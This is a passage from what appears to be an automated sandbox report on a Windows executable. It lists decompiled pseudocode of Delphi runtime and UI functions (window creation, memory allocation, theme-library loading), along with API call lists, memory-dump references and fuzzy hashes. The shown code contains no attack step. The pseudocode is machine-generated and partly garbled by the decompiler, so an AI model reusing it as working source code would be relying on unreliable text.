					_t162 = _v8;
					 *((intOrPtr*)(_t162 + 0x34)) = 0;
					return _t162;
				} else {
					_t191 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x34)) + 8)) - 1;
					if(_t191 < 0) {
						goto L14;
					}
					_t192 = _t191 + 1;
					_v20 = 0;
					do {
						 *((intOrPtr*)( *((intOrPtr*)(E00956C88( *((intOrPtr*)(_v8 + 0x34)), _v20))) + 0xc))();
						_v20 = _v20 + 1;
						_t192 = _t192 - 1;
					} while (_t192 != 0);
					goto L14;
				}
			}

























                                            0x0095b310
                                            0x0095b310
                                            0x0095b311
                                            0x0095b313
                                            0x0095b31b
                                            0x0095b31e
                                            0x0095b321
                                            0x0095b324
                                            0x0095b327
                                            0x0095b32a
                                            0x0095b32d
                                            0x0095b330
                                            0x0095b33e
                                            0x0095b344
                                            0x0095b34b
                                            0x0095b34e
                                            0x0095b355
                                            0x0095b363
                                            0x0095b371
                                            0x0095b37d
                                            0x0095b37f
                                            0x0095b382
                                            0x0095b386
                                            0x0095b3c0
                                            0x0095b3c9
                                            0x0095b3d1
                                            0x0095b3d5
                                            0x0095b3e7
                                            0x0095b3ec
                                            0x0095b3ef
                                            0x0095b3ef
                                            0x0095b3ef
                                            0x0095b3fa
                                            0x0095b405
                                            0x0095b412
                                            0x0095b3d7
                                            0x0095b3dd
                                            0x0095b3dd
                                            0x0095b388
                                            0x0095b38e
                                            0x0095b3a2
                                            0x0095b3ab
                                            0x0095b3b8
                                            0x0095b3b8
                                            0x0095b41b
                                            0x0095b439
                                            0x0095b43e
                                            0x0095b43f
                                            0x0095b444
                                            0x0095b447
                                            0x0095b450
                                            0x0095b45e
                                            0x0095b465
                                            0x0095b481
                                            0x0095b467
                                            0x0095b46d
                                            0x0095b46d
                                            0x0095b486
                                            0x0095b487
                                            0x0095b48c
                                            0x0095b48f
                                            0x0095b4a5
                                            0x0095b4b3
                                            0x0095b4b3
                                            0x0095b4c1
                                            0x0095b4ca
                                            0x0095b4d5
                                            0x0095b4e5
                                            0x0095b4ee
                                            0x0095b4f7
                                            0x0095b528
                                            0x0095b52a
                                            0x0095b52d
                                            0x0095b530
                                            0x0095b539
                                            0x0095b541
                                            0x0095b541
                                            0x0095b546
                                            0x0095b54b
                                            0x0095b54e
                                            0x0095b4f9
                                            0x0095b502
                                            0x0095b505
                                            0x00000000
                                            0x00000000
                                            0x0095b507
                                            0x0095b508
                                            0x0095b50f
                                            0x0095b51f
                                            0x0095b522
                                            0x0095b525
                                            0x0095b525
                                            0x00000000
                                            0x0095b50f

                                            APIs
                                            • IntersectRect.USER32(00000000,0095B54F,?,00000000,0095B56F,?,00000001,?,00000000,0095B609,?,?,?,00956AF2), ref: 0095B4E5
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: IntersectRect
                                            • String ID:
                                            • API String ID: 481094312-0
                                            • Opcode ID: c096bc41b58d33dd335a2a88e0edef83a7620097c9df549e9b23d8a867348f4e
                                            • Instruction ID: 318917a50ab05bb105176f11300d87938d222549251b7bf779dbeff9097c3760
                                            • Opcode Fuzzy Hash: c096bc41b58d33dd335a2a88e0edef83a7620097c9df549e9b23d8a867348f4e
                                            • Instruction Fuzzy Hash: 7A818F74A00208DFCB04DFAAC59199DBBF5FF89305F6185A5E800AB722D734AE45DF90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00971AA0, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 78%
                                            			E00971AA0(void* __ebx, char __edx, void* __esi, void* __fp0) {
				char _v5;
				char _v12;
				void* _t21;
				intOrPtr _t25;
				intOrPtr _t30;
				intOrPtr* _t31;
				char _t36;
				void* _t44;
				char _t47;
				struct HWND__* _t53;
				void* _t57;
				void* _t58;
				struct HWND__* _t59;
				void* _t63;

				_t63 = __fp0;
				_t47 = __edx;
				_t57 = _t58;
				_t59 = _t58 + 0xfffffff8;
				_v12 = 0;
				if(__edx != 0) {
					_t59 = _t59 + 0xfffffff0;
					_t21 = E00943438(_t21, _t57);
				}
				_v5 = _t47;
				_t44 = _t21;
				_push(_t57);
				_push(0x971b98);
				 *[fs:eax] = _t59;
				E0096E754(0);
				_t25 = E0095D6B8(E009734C4, _t44); // executed
				 *((intOrPtr*)(_t44 + 0x18c)) = _t25;
				 *((intOrPtr*)(_t44 + 0x170)) = E0095FC88(1);
				GetParent( *[fs:eax]);
				 *((char*)(_t44 + 0x1a9)) = 1;
				 *((intOrPtr*)(_t44 + 0x1a0)) = 0xffffffff;
				 *((char*)(_t44 + 0x184)) = 3;
				_t30 =  *0x99b22c; // 0x99c744
				if( *((intOrPtr*)(_t30 + 4)) != 0x11) {
					_t31 =  *0x99b204; // 0x99cbbc
					E0098C974( *_t31,  &_v12, _t63);
					E00944004(_t44 + 0x188, _v12);
				} else {
					_t10 = _t44 + 0x188; // 0x188
					E00943FB0(_t10);
				}
				 *((char*)(_t44 + 0x1a7)) = 0;
				_t36 =  *0x971bc0; // 0xf
				 *((char*)(_t44 + 0x162)) = _t36;
				 *((char*)(_t44 + 0x163)) = 2;
				 *((char*)(_t44 + 0x164)) = 1;
				 *((intOrPtr*)(_t44 + 0x168)) = 1;
				 *((char*)(_t44 + 0x150)) = 1;
				_pop(_t53);
				 *[fs:eax] = _t53;
				_push(0x971b9f);
				return E00943FB0( &_v12);
			}

















                                            0x00971aa0
                                            0x00971aa0
                                            0x00971aa1
                                            0x00971aa3
                                            0x00971aaa
                                            0x00971aaf
                                            0x00971ab1
                                            0x00971ab4
                                            0x00971ab4
                                            0x00971ab9
                                            0x00971abc
                                            0x00971ac0
                                            0x00971ac1
                                            0x00971ac9
                                            0x00971ad0
                                            0x00971adb
                                            0x00971ae0
                                            0x00971af4
                                            0x00971aff
                                            0x00971b04
                                            0x00971b0b
                                            0x00971b15
                                            0x00971b1c
                                            0x00971b25
                                            0x00971b37
                                            0x00971b3e
                                            0x00971b4c
                                            0x00971b27
                                            0x00971b27
                                            0x00971b2d
                                            0x00971b2d
                                            0x00971b51
                                            0x00971b58
                                            0x00971b5d
                                            0x00971b63
                                            0x00971b6a
                                            0x00971b71
                                            0x00971b7b
                                            0x00971b84
                                            0x00971b87
                                            0x00971b8a
                                            0x00971b97

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Parent
                                            • String ID:
                                            • API String ID: 975332729-0
                                            • Opcode ID: 48d6456d93a2f7a50b4fb81e27ab405ef3d172e988c423862d21532d2d8d6040
                                            • Instruction ID: f3136ba2319f762057d1940f5c10fd1e637fd73be57bff0d1256c3e02fc983d9
                                            • Opcode Fuzzy Hash: 48d6456d93a2f7a50b4fb81e27ab405ef3d172e988c423862d21532d2d8d6040
                                            • Instruction Fuzzy Hash: 2421B0306082809FEB01DF28C8C1BD93BA4AB46314F4882F4EC588F39BDB725A09C761
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00956838, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 65%
                                            			E00956838(void* __eax, struct HINSTANCE__* __edx) {
				intOrPtr _v8;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t10;
				intOrPtr _t15;
				struct HINSTANCE__* _t20;
				intOrPtr* _t22;
				intOrPtr _t30;
				void* _t32;
				intOrPtr* _t35;
				intOrPtr _t38;
				intOrPtr _t40;

				_t38 = _t40;
				_push(_t22);
				_t35 = _t22;
				_t20 = __edx;
				_t32 = __eax;
				if(__edx == 0) {
					_t20 =  *0x99c668; // 0x940000
				}
				_t10 = FindResourceA(_t20, E00944470(_t32), 0xa) & 0xffffff00 | _t9 != 0x00000000;
				_t43 = _t10;
				if(_t10 == 0) {
					return _t10;
				} else {
					_v8 = E00959158(_t20, 1, 0xa, _t32);
					_push(_t38);
					_push(0x9568ac);
					_push( *[fs:eax]);
					 *[fs:eax] = _t40;
					_t15 = E00958C58(_v8, _t20,  *_t35, _t32, _t35, _t43); // executed
					 *_t35 = _t15;
					_pop(_t30);
					 *[fs:eax] = _t30;
					_push(E009568B3);
					return E0094312C(_v8);
				}
			}


















                                            0x00956839
                                            0x0095683b
                                            0x0095683f
                                            0x00956841
                                            0x00956843
                                            0x00956847
                                            0x00956849
                                            0x00956849
                                            0x00956861
                                            0x00956864
                                            0x00956866
                                            0x009568ba
                                            0x00956868
                                            0x00956879
                                            0x0095687e
                                            0x0095687f
                                            0x00956884
                                            0x00956887
                                            0x0095688f
                                            0x00956894
                                            0x00956898
                                            0x0095689b
                                            0x0095689e
                                            0x009568ab
                                            0x009568ab

                                            APIs
                                            • FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 0095685A
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: FindResource
                                            • String ID:
                                            • API String ID: 1635176832-0
                                            • Opcode ID: 42ab4019762ac06147517fb35074e0e4c55393b8d9848bfe9eac02bf72b933b4
                                            • Instruction ID: 9bd73b0f987a77b2e6f8eed465aa5e2e425815ec6b9ef3b8d7f2f25d9625cff3
                                            • Opcode Fuzzy Hash: 42ab4019762ac06147517fb35074e0e4c55393b8d9848bfe9eac02bf72b933b4
                                            • Instruction Fuzzy Hash: 3701DF71308301AFE700EF6AEC92E2AB7ADEBCA7157514079FA0497251DA729C099760
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00946BEC, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00946BEC(long __eax, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32, long _a36) {
				CHAR* _v8;
				void* _t13;
				struct HWND__* _t24;
				CHAR* _t29;
				long _t32;

				_v8 = _t29;
				_t32 = __eax;
				_t13 = E00942954();
				_t24 = CreateWindowExA(_t32, __edx, _v8, _a36, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
				E00942944(_t13);
				return _t24;
			}








                                            0x00946bf3
                                            0x00946bf8
                                            0x00946bfa
                                            0x00946c2b
                                            0x00946c34
                                            0x00946c40

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: f083d1d62d0ca107c64014bacb9a1492d39e7fdc963fb5fe00a40b706298035d
                                            • Instruction ID: 02cd8dd91bcae1b8f4ea1baa0b89eb4cb03dee6c03ce2d15b602b0d72f470f78
                                            • Opcode Fuzzy Hash: f083d1d62d0ca107c64014bacb9a1492d39e7fdc963fb5fe00a40b706298035d
                                            • Instruction Fuzzy Hash: 74F09DB2704158BF8B84DE9DDD81EDB77ECEB8D2A4B054125FA0CD3201D630ED118BA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 009602D8, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E009602D8(void* __eax, struct tagSIZE* __ecx, void* __edx, void* __eflags) {
				int _t9;
				int _t13;
				void* _t14;
				intOrPtr _t17;

				_t14 = __eax;
				_t17 =  *0x960318; // 0x3
				E00960590(__eax, __ecx, _t17);
				 *__ecx = 0;
				__ecx->cy = 0;
				_t9 = E00944270(__edx);
				_t13 = GetTextExtentPoint32A( *(_t14 + 4), E00944470(__edx), _t9, __ecx); // executed
				return _t13;
			}







                                            0x009602df
                                            0x009602e1
                                            0x009602e9
                                            0x009602f0
                                            0x009602f4
                                            0x009602fa
                                            0x0096030c
                                            0x00960314

                                            APIs
                                            • GetTextExtentPoint32A.GDI32(?,00000000,00000000), ref: 0096030C
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ExtentPoint32Text
                                            • String ID:
                                            • API String ID: 223599850-0
                                            • Opcode ID: 4410f34b9af44a6f3e68fc9bacd7a8fc18d861e7d481388e30fa377155758e60
                                            • Instruction ID: e0a604e1088fc1413c7bfbd56984443455a1e826e2ef32d7909342f54112ed16
                                            • Opcode Fuzzy Hash: 4410f34b9af44a6f3e68fc9bacd7a8fc18d861e7d481388e30fa377155758e60
                                            • Instruction Fuzzy Hash: 3FE0ECB27112105F8790EBBD6CC1F6BABDD8FCD221308887AB58CC3312E6A4DC459764
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00945278, Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00945278(void* __eax) {
				char _v272;
				intOrPtr _t14;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t19;

				_t16 = __eax;
				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
					_t3 = _t16 + 4; // 0x940000
					GetModuleFileNameA( *_t3,  &_v272, 0x105);
					_t14 = E009454B4(_t19); // executed
					_t18 = _t14;
					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
					if(_t18 == 0) {
						_t5 = _t16 + 4; // 0x940000
						 *((intOrPtr*)(_t16 + 0x10)) =  *_t5;
					}
				}
				_t7 = _t16 + 0x10; // 0x940000
				return  *_t7;
			}








                                            0x00945280
                                            0x00945286
                                            0x00945292
                                            0x00945296
                                            0x0094529f
                                            0x009452a4
                                            0x009452a6
                                            0x009452ab
                                            0x009452ad
                                            0x009452b0
                                            0x009452b0
                                            0x009452ab
                                            0x009452b3
                                            0x009452be

                                            APIs
                                            • GetModuleFileNameA.KERNEL32(00940000,?,00000105,108B0099,00000000,009452E0,00956A10,?,00000000,00956A36,?,?,00000000,?,00956AAF), ref: 00945296
                                              • Part of subcall function 009454B4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,108B0099,0099A0A4), ref: 009454D0
                                              • Part of subcall function 009454B4: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,108B0099,0099A0A4), ref: 009454EE
                                              • Part of subcall function 009454B4: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,108B0099,0099A0A4), ref: 0094550C
                                              • Part of subcall function 009454B4: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 0094552A
                                              • Part of subcall function 009454B4: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,009455B9,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00945573
                                              • Part of subcall function 009454B4: RegQueryValueExA.ADVAPI32(?,00945720,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,009455B9,?,80000001), ref: 00945591
                                              • Part of subcall function 009454B4: RegCloseKey.ADVAPI32(?,009455C0,00000000,?,?,00000000,009455B9,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 009455B3
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Open$FileModuleNameQueryValue$Close
                                            • String ID:
                                            • API String ID: 2796650324-0
                                            • Opcode ID: 350b5a5c769b985e26293a9f046333db618e0437172ac98b77d52d2e4425efbf
                                            • Instruction ID: ec9d0aa180a7756ef349fcb3f73e00d3e3e78f6ee76da3595dc5dba2cf8c2514
                                            • Opcode Fuzzy Hash: 350b5a5c769b985e26293a9f046333db618e0437172ac98b77d52d2e4425efbf
                                            • Instruction Fuzzy Hash: 6EE06D71A016108BCB10DE9CC9C1F4333D8AB08750F010951AD64CF347D3B0DD608BD0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00947E50, Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00947E50(void* __eax, void* __edx) {
				int _t3;
				char* _t5;
				int _t7;
				int _t10;
				void* _t12;

				_t12 = __eax;
				_t3 = E00944270(__edx);
				_t5 = E00944470(__edx);
				_t7 = E00944270(_t12);
				_t10 = CompareStringA(0x400, 1, E00944470(_t12), _t7, _t5, _t3); // executed
				return _t10 - 2;
			}








                                            0x00947e54
                                            0x00947e58
                                            0x00947e60
                                            0x00947e68
                                            0x00947e7d
                                            0x00947e87

                                            APIs
                                            • CompareStringA.KERNEL32(00000400,00000001,00000000,00000000,00000000,00000000,?,?,00947E97,?,?,00948241), ref: 00947E7D
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CompareString
                                            • String ID:
                                            • API String ID: 1825529933-0
                                            • Opcode ID: 79afdc44171786da5f9e3fbd7fb299f76e04aa85209ec592db92dc993bba62a6
                                            • Instruction ID: ad3ef1a714c1dc9f3cd90bd9f930ff856c86120f6cf9c4422ce353619fe65025
                                            • Opcode Fuzzy Hash: 79afdc44171786da5f9e3fbd7fb299f76e04aa85209ec592db92dc993bba62a6
                                            • Instruction Fuzzy Hash: 84D0C9E13016203AD690B6FC2C83F5A01CD4BC9715F004021B218E7253DAD4ADAA02A9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 009416E8, Relevance: 1.3, APIs: 1, Instructions: 54memoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E009416E8(signed int __eax, void** __ecx, intOrPtr __edx) {
				signed int _v20;
				void** _v24;
				void* _t15;
				void** _t16;
				void* _t17;
				signed int _t27;
				intOrPtr* _t29;
				void* _t31;
				intOrPtr* _t32;

				_v24 = __ecx;
				 *_t32 = __edx;
				_t31 = __eax & 0xfffff000;
				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
				 *_v24 = _t31;
				_t15 = _v20 - _t31;
				_v24[1] = _t15;
				_t29 =  *0x99c5ec; // 0xa434d4
				while(_t29 != 0x99c5ec) {
					_t17 =  *(_t29 + 8);
					_t27 =  *((intOrPtr*)(_t29 + 0xc)) + _t17;
					if(_t31 > _t17) {
						_t17 = _t31;
					}
					if(_t27 > _v20) {
						_t27 = _v20;
					}
					if(_t27 > _t17) {
						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
						if(_t15 == 0) {
							_t16 = _v24;
							 *_t16 = 0;
							return _t16;
						}
					}
					_t29 =  *_t29;
				}
				return _t15;
			}












                                            0x009416ef
                                            0x009416f3
                                            0x009416fa
                                            0x0094170f
                                            0x00941717
                                            0x0094171d
                                            0x00941723
                                            0x00941726
                                            0x0094176a
                                            0x0094172e
                                            0x00941734
                                            0x00941738
                                            0x0094173a
                                            0x0094173a
                                            0x00941740
                                            0x00941742
                                            0x00941742
                                            0x00941748
                                            0x00941755
                                            0x0094175c
                                            0x0094175e
                                            0x00941764
                                            0x00000000
                                            0x00941764
                                            0x0094175c
                                            0x00941768
                                            0x00941768
                                            0x00941779

                                            APIs
                                            • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 00941755
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: dd9247c0441f4a5cbf63d682a4f2709b1160ab83b1a159f8733d8c8ab8036204
                                            • Instruction ID: 44f38b9d1456f2a8d060efa10dc0d751e42bcfa771761bc4f3f2151182df60b3
                                            • Opcode Fuzzy Hash: dd9247c0441f4a5cbf63d682a4f2709b1160ab83b1a159f8733d8c8ab8036204
                                            • Instruction Fuzzy Hash: 53115EB6A09705AFC3209F29CD80A1ABBE9EFD47A0F15C52DE59897354D630BC80DB51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0095D6B8, Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0095D6B8(intOrPtr _a4, intOrPtr _a8) {
				void* _t14;
				void _t15;
				intOrPtr _t25;
				char* _t26;
				void* _t35;

				if( *0x99c88c == 0) {
					_t14 = VirtualAlloc(0, 0x1000, 0x1000, 0x40); // executed
					_t35 = _t14;
					_t15 =  *0x99c888; // 0x9d0000
					 *_t35 = _t15;
					_t1 = _t35 + 4; // 0x4
					E009428F8(0x99a408, 2, _t1);
					_t2 = _t35 + 5; // 0x5
					 *((intOrPtr*)(_t35 + 6)) = E0095D6B0(_t2, E0095D690);
					_t4 = _t35 + 0xa; // 0xa
					_t26 = _t4;
					do {
						 *_t26 = 0xe8;
						_t5 = _t35 + 4; // 0x4
						 *((intOrPtr*)(_t26 + 1)) = E0095D6B0(_t26, _t5);
						 *((intOrPtr*)(_t26 + 5)) =  *0x99c88c;
						 *0x99c88c = _t26;
						_t26 = _t26 + 0xd;
					} while (_t26 - _t35 < 0xffc);
					 *0x99c888 = _t35;
				}
				_t25 =  *0x99c88c;
				 *0x99c88c =  *((intOrPtr*)(_t25 + 5));
				 *((intOrPtr*)(_t25 + 5)) = _a4;
				 *((intOrPtr*)(_t25 + 9)) = _a8;
				return  *0x99c88c;
			}








                                            0x0095d6c6
                                            0x0095d6d6
                                            0x0095d6db
                                            0x0095d6dd
                                            0x0095d6e2
                                            0x0095d6e4
                                            0x0095d6f1
                                            0x0095d6fb
                                            0x0095d703
                                            0x0095d706
                                            0x0095d706
                                            0x0095d709
                                            0x0095d709
                                            0x0095d70c
                                            0x0095d716
                                            0x0095d71b
                                            0x0095d71e
                                            0x0095d720
                                            0x0095d727
                                            0x0095d72e
                                            0x0095d72e
                                            0x0095d736
                                            0x0095d73b
                                            0x0095d740
                                            0x0095d746
                                            0x0095d74d

                                            APIs
                                            • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0095D6D6
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: 150410238818dba8f521cce64838adb23196c38d80385c68a9f6367a97f56a21
                                            • Instruction ID: 4d186d8563e4b94bc73ae7dda3ff4073600212d4bf49e7bbe4ff03bc0651d71d
                                            • Opcode Fuzzy Hash: 150410238818dba8f521cce64838adb23196c38d80385c68a9f6367a97f56a21
                                            • Instruction Fuzzy Hash: 9B117CB42017058FD720DF1AC880B46FBE4EF88350F20C53AE9689F785D370E9458BA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 009413B0, Relevance: 1.3, APIs: 1, Instructions: 34memoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E009413B0() {
				intOrPtr* _t4;
				void* _t5;
				void _t6;
				intOrPtr* _t9;
				void* _t12;
				void* _t14;

				if( *0x99c5e8 != 0) {
					L5:
					_t4 =  *0x99c5e8;
					 *0x99c5e8 =  *_t4;
					return _t4;
				} else {
					_t5 = LocalAlloc(0, 0x644); // executed
					_t12 = _t5;
					if(_t12 != 0) {
						_t6 =  *0x99c5e4; // 0xa42ea0
						 *_t12 = _t6;
						 *0x99c5e4 = _t12;
						_t14 = 0;
						do {
							_t2 = (_t14 + _t14) * 8; // 0x4
							_t9 = _t12 + _t2 + 4;
							 *_t9 =  *0x99c5e8;
							 *0x99c5e8 = _t9;
							_t14 = _t14 + 1;
						} while (_t14 != 0x64);
						goto L5;
					} else {
						return 0;
					}
				}
			}









                                            0x009413ba
                                            0x009413f6
                                            0x009413f6
                                            0x009413fa
                                            0x009413fe
                                            0x009413bc
                                            0x009413c3
                                            0x009413c8
                                            0x009413cc
                                            0x009413d3
                                            0x009413d8
                                            0x009413da
                                            0x009413e0
                                            0x009413e2
                                            0x009413e6
                                            0x009413e6
                                            0x009413ec
                                            0x009413ee
                                            0x009413f0
                                            0x009413f1
                                            0x00000000
                                            0x009413ce
                                            0x009413d2
                                            0x009413d2
                                            0x009413cc

                                            APIs
                                            • LocalAlloc.KERNEL32(00000000,00000644,?,0099C5FC,00941413,?,?,009414B2,?,0000000C,?,?,00003FFF,009419F3), ref: 009413C3
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: AllocLocal
                                            • String ID:
                                            • API String ID: 3494564517-0
                                            • Opcode ID: 88fc820cdbba65b5b8ad3543e87b45af3cad53beacabc87c0ee0c8f9b737c7b5
                                            • Instruction ID: 558da0162bc36af6a6d91b3d1568e9dacf707ba54808a07e061079353455088d
                                            • Opcode Fuzzy Hash: 88fc820cdbba65b5b8ad3543e87b45af3cad53beacabc87c0ee0c8f9b737c7b5
                                            • Instruction Fuzzy Hash: C7F058B17052018FDB24CFADD880AA673E5EBA9356F20807AE285C7710E7319C81AB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Non-executed Functions

                                            Function 00967154, Relevance: 166.5, APIs: 48, Strings: 47, Instructions: 266libraryloaderCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 90%
                                            			E00967154(void* __ebx, void* __ecx) {
				char _v5;
				intOrPtr _t2;
				intOrPtr _t6;
				intOrPtr _t108;
				intOrPtr _t111;

				_t2 =  *0x99ca48; // 0xf00dc8
				E00966F4C(_t2);
				_push(_t111);
				_push(0x967507);
				_push( *[fs:eax]);
				 *[fs:eax] = _t111;
				 *0x99ca44 =  *0x99ca44 + 1;
				if( *0x99ca40 == 0) {
					 *0x99ca40 = LoadLibraryA("uxtheme.dll");
					if( *0x99ca40 > 0) {
						 *0x99c980 = GetProcAddress( *0x99ca40, "OpenThemeData");
						 *0x99c984 = GetProcAddress( *0x99ca40, "CloseThemeData");
						 *0x99c988 = GetProcAddress( *0x99ca40, "DrawThemeBackground");
						 *0x99c98c = GetProcAddress( *0x99ca40, "DrawThemeText");
						 *0x99c990 = GetProcAddress( *0x99ca40, "GetThemeBackgroundContentRect");
						 *0x99c994 = GetProcAddress( *0x99ca40, "GetThemeBackgroundContentRect");
						 *0x99c998 = GetProcAddress( *0x99ca40, "GetThemePartSize");
						 *0x99c99c = GetProcAddress( *0x99ca40, "GetThemeTextExtent");
						 *0x99c9a0 = GetProcAddress( *0x99ca40, "GetThemeTextMetrics");
						 *0x99c9a4 = GetProcAddress( *0x99ca40, "GetThemeBackgroundRegion");
